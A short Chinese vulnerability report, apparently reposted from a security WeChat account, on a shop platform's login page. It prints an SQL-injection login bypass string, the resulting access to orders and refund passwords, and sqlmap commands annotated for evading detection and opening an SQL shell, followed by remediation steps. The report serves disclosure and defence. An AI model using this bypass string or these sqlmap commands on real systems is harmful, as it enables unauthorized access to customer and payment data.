目标 url:http://xx.com/login.aspx
资产归属证明,该资产属于xxxx
万能密码进入后台,万能密码')or('a'='a
拥有对商店所有订单的全面查询权限,可以查看和检索所有订单的详细信息。
所有收银机的退款密码
对登录页面进行跑sqlmap
python sqlmap.py -r 1.txt --batch --random-agent --time-sec=2 --risk 3 --is-dba
# -r 1.txt:指定一个包含 HTTP 请求的文件(1.txt),sqlmap 将根据该请求进行注入测试
# --batch:启用批处理模式,自动接受默认选项,避免人工干预
# --random-agent:每次请求使用随机生成的 User-Agent,帮助避免被目标服务器识别为自动化工具
# --time-sec=2:设置等待响应的时间延迟为 2 秒,控制请求频率,减少被防护机制阻止的风险
# --risk 3:设置注入测试的风险级别为 3
# --is-dba:假设目标是数据库管理员 (DBA) 权限,进行更高级别的测试
python sqlmap.py -r 1.txt --batch --random-agent --time-sec=2 --risk 3 --sql-shell
python sqlmap.py # 运行 sqlmap 工具的主 Python 脚本
-r 1.txt # 从 1.txt 文件中读取 HTTP 请求信息,1.txt 中应该包含目标的 URL、请求头等信息
--batch # 启用批处理模式,自动选择默认选项,避免用户交互
--random-agent # 使用随机的用户代理(User-Agent),以防止被目标网站识别或拦截
--time-sec=2 # 设置每次请求之间的时间延迟为 2 秒,避免过于频繁的请求,减少被拦截的风险
--risk 3 # 设置风险级别为 3
--sql-shell # 启用 SQL 交互式命令行模式(SQL Shell),允许直接在数据库中执行 SQL 查询
1. 立即更改管理员密码,并确保使用复杂的密码。
2. 移除硬编码的万能密码,并加强身份验证机制。
3. 启用多因素认证、限制IP访问、实施登录尝试限制等方式增强安全性。
4. 定期更新系统和应用,确保安全补丁及时应用。
5. 进行安全审计,发现并修复可能存在的漏洞。
原文始发于微信公众号(信安一把索):某平台的万能密码 - 漏洞报告
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论